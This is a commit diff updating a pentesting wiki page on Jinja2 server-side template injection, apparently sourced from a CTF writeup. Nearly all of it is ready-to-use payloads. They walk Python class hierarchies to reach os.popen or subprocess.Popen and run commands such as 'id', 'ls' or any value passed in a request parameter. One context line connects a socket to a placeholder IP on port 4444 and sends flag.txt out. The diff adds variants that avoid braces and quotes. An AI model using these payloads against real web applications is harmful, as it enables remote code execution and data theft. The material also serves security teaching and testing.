Update jinja2-ssti.md

# Reference

https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

https://ctftime.org/writeup/33605

pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md

@@ -153,8 +153,10 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o
 # The class 396 is the class <class 'subprocess.Popen'>
 {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
 
-# Calling os.popen without guessing the index of the class
+# Without '{{' and '}}'
+{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']() == 'chiv' %} a {% endif %}
 
+# Calling os.popen without guessing the index of the class
 {% raw %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
@@ -163,6 +165,8 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 {% endraw %}
 
+## Passing the cmd line ?cmd=id, Without " and ' 
+{{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1).communicate()[0].strip() }}
 
 ```